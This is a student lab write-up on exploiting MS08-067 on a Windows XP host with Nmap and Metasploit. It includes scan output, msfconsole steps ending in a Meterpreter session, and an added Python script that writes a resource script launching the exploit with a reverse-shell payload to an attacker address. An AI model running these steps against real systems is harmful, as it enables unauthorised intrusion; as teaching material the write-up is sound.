Exploitation of Windows XP SP2: Remote exploitation of Windows XP
An exploit is a piece of software or a script that takes advantage of a vulnerability in a system to let an attacker take control of it. Attackers normally use vulnerability scanners such as Nessus, Nexpose or OpenVAS (or, as in this project, Nmap's vulnerability-detection scripts) to find these vulnerabilities first.
The Remote Exploitation of Windows XP project was done by ICSS student Adrish Mitra. The full process is discussed below.
Project Name: Remote Exploitation of Windows XP
Author Name: Adrish Mitra
Publish Date: 24-07-2018
Exploit Documentation
Subject: Remote exploitation of Windows XP
Vulnerabilities – Nmap script result and threat level
smb-vuln-cve2009-3103 – VULNERABLE (Medium; not applicable to XP, see below)
smb-vuln-ms08-067 – VULNERABLE (High)
smb-vuln-ms10-054 – false (not vulnerable)
smb-vuln-ms10-061 – ERROR (script did not run; inconclusive)
Hacking Windows using the remote exploit for the MS08-067 vulnerability:
1. Scan the target system with Nmap, including its SMB vulnerability scripts; the host script results below are what the exploit selection is based on.
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-11 10:19 IST
Nmap scan report for 192.168.0.122
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka “SMBv2 Negotiation Vulnerability.”
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
2. For remote code execution, open msfconsole and search for the MS08-067 exploit module (search ms08_067).
The search result shows the exploit module for the MS08-067 vulnerability.
3. Select this exploit with use.
4. Set RHOST to the victim's IP address and RPORT to the port on which the vulnerable Server service is reached over SMB; by default that is port 445.
Then run the exploit. Nothing has to be uploaded to the victim first: the module sends the crafted RPC request over SMB, and on success a session is created in msfconsole, giving remote access to the machine.
5. The victim's system information, as displayed from the session (sysinfo in Meterpreter).
6. On the victim's machine, the established connection to the attacker's system can be confirmed by listing the active network connections (for example with netstat -an) and looking for the attacker's address in the list of foreign IP addresses.
Results other than MS08-067
smb-vuln-cve2009-3103:
VULNERABLE:
SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
State: VULNERABLE
IDs: CVE:CVE-2009-3103
Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
aka "SMBv2 Negotiation Vulnerability."
Disclosure date: 2009-09-08
Although the script reports the host as VULNERABLE, the affected products in its own description are Windows Vista, Windows Server 2008 and the Windows 7 RC. Windows XP has no SMBv2 implementation at all (srv2.sys was introduced with Vista), so on an XP SP2 target this result is a false positive and the machine cannot be exploited through CVE-2009-3103.
smb-vuln-ms10-054: false
The script ran and found the target not vulnerable, so MS10-054 cannot be used to exploit this machine.
smb-vuln-ms10-061: ERROR: Script execution failed.
Here the check did not run at all (the script needs a reachable printer share on the target and fails when it cannot find or access one), so this result is inconclusive rather than negative. It should be re-run with -d and a valid printer share before MS10-061 is ruled out; an error must never be read as "not vulnerable".
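The two decisions this writeup makes by hand, reading the Nmap host script results (VULNERABLE, false, ERROR) and then typing the matching exploit, RHOST and RPORT into msfconsole, can be done in one pass. The following example is added here and is not the project's or ICSS's code. It parses the Nmap output above (re-typed inline with Nmap's normal indentation and "|_" block terminators, as constructed sample input, not live output), classifies each script result, applies the same check the text applies to CVE-2009-3103 (a VULNERABLE verdict only counts when the script's own product list names the target OS), treats errors as inconclusive, and writes a Metasploit resource script for the findings that survive. Assumptions: the script-to-module mapping is the author's (the module names are real Metasploit modules, but confirm them with search in msfconsole), the option is spelled RHOSTS as in current Metasploit (older versions use RHOST, as the writeup does), the payload windows/meterpreter/reverse_tcp is a choice rather than something the page states, 192.168.0.10 is a made-up attacker address, and the scan itself is not shown on the page (something like nmap --script "smb-vuln*,samba-vuln*" 192.168.0.122 would produce these host script results).

```python
"""Triage Nmap smb-vuln* host-script results and write the genuinely exploitable ones into a
Metasploit resource script (msfconsole -r triage.rc). Added example, not ICSS/project code."""
import re
from dataclasses import dataclass

# Constructed sample: the writeup's host-script results for 192.168.0.122, re-typed with
# Nmap's normal indentation and "|_" block terminators. Not live output from this code.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.0.122
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-cve2009-3103:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft
|           Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC
|_    Disclosure date: 2009-09-08
| smb-vuln-ms08-067:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1
|           and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote code execution.
|_    Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
"""

# NSE script name -> Metasploit module. Assumed mapping; confirm with `search` in msfconsole.
MSF_MODULES = {
    "smb-vuln-ms08-067": "exploit/windows/smb/ms08_067_netapi",
    "smb-vuln-cve2009-3103": "exploit/windows/smb/ms09_050_smb2_negotiate_func_index",
    "smb-vuln-ms10-061": "exploit/windows/smb/ms10_061_spoolss",
}
SCRIPT_HDR = re.compile(r"^\|_?\s*([a-z][a-z0-9]*(?:-[a-z0-9]+)+):\s?(.*)$")  # "| script-name: ..."
STATE_RE = re.compile(r"State:\s*(NOT VULNERABLE|LIKELY VULNERABLE|VULNERABLE)")
TARGET_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)

@dataclass
class Finding:
    name: str
    state: str        # VULNERABLE, NOT VULNERABLE, or INCONCLUSIVE (script error / access denied)
    text: str         # the script's whole output joined into one line
    verdict: str = ""

def _finding(name, lines):
    text = " ".join(l.strip() for l in lines if l.strip())
    m = STATE_RE.search(text)
    if m:
        state = "NOT VULNERABLE" if m.group(1) == "NOT VULNERABLE" else "VULNERABLE"
    else:  # one-line scripts print true/false; anything else (ERROR, NT_STATUS_*) proves nothing
        state = {"true": "VULNERABLE", "false": "NOT VULNERABLE"}.get(text.lower(), "INCONCLUSIVE")
    return Finding(name, state, text)

def parse_host_scripts(output):
    """One Finding per NSE script under 'Host script results:'; a '|_' line closes a block."""
    findings, current, lines, in_scripts = {}, None, [], False
    for line in output.splitlines():
        if line.startswith("Host script results:"):
            in_scripts = True
        elif in_scripts and line.startswith("|"):
            hdr = SCRIPT_HDR.match(line)
            if hdr:
                current, lines = hdr.group(1), [hdr.group(2)]
            elif current:
                lines.append(line.lstrip("|_ "))
            if current and line.startswith("|_"):
                findings[current] = _finding(current, lines)
                current = None
    return findings

def triage(findings, target_os):
    """VULNERABLE counts only if the script's own product list names the target OS."""
    os_re = re.compile(r"\b%s\b" % re.escape(target_os))
    for f in findings.values():
        if f.state == "VULNERABLE":
            f.verdict = "EXPLOITABLE" if os_re.search(f.text) else "FALSE_POSITIVE"
        elif f.state == "NOT VULNERABLE":
            f.verdict = "NOT_VULNERABLE"
        else:
            f.verdict = "INCONCLUSIVE"  # re-run with -d / credentials; never treat as safe
    return findings

def build_resource_script(output, lhost, target_os="XP"):
    """msfconsole commands for each EXPLOITABLE finding that has a known module."""
    target = TARGET_RE.search(output).group(1)
    findings = triage(parse_host_scripts(output), target_os)
    rc = [f"# nmap triage for {target}"] + [f"# {f.name}: {f.state} -> {f.verdict}"
                                             for f in findings.values()]
    for f in findings.values():
        if f.verdict == "EXPLOITABLE" and f.name in MSF_MODULES:
            rc += [f"use {MSF_MODULES[f.name]}", f"set RHOSTS {target}", "set RPORT 445",
                   "set PAYLOAD windows/meterpreter/reverse_tcp", f"set LHOST {lhost}", "exploit -j"]
    return "\n".join(rc) + "\n"

if __name__ == "__main__":
    print(build_resource_script(NMAP_OUTPUT, lhost="192.168.0.10"))  # attacker IP: assumed
```

Run as is, it prints a resource script containing only the MS08-067 module for 192.168.0.122 on port 445: the CVE-2009-3103 hit is dropped as a false positive because its product list does not mention XP, ms10-054 is recorded as not vulnerable, and the two results that did not run (ERROR and NT_STATUS_ACCESS_DENIED) are left as INCONCLUSIVE in the header comments rather than silently discarded. Passing target_os="Vista" instead makes the SMBv2 finding exploitable, which is exactly the case the Nmap script was written for.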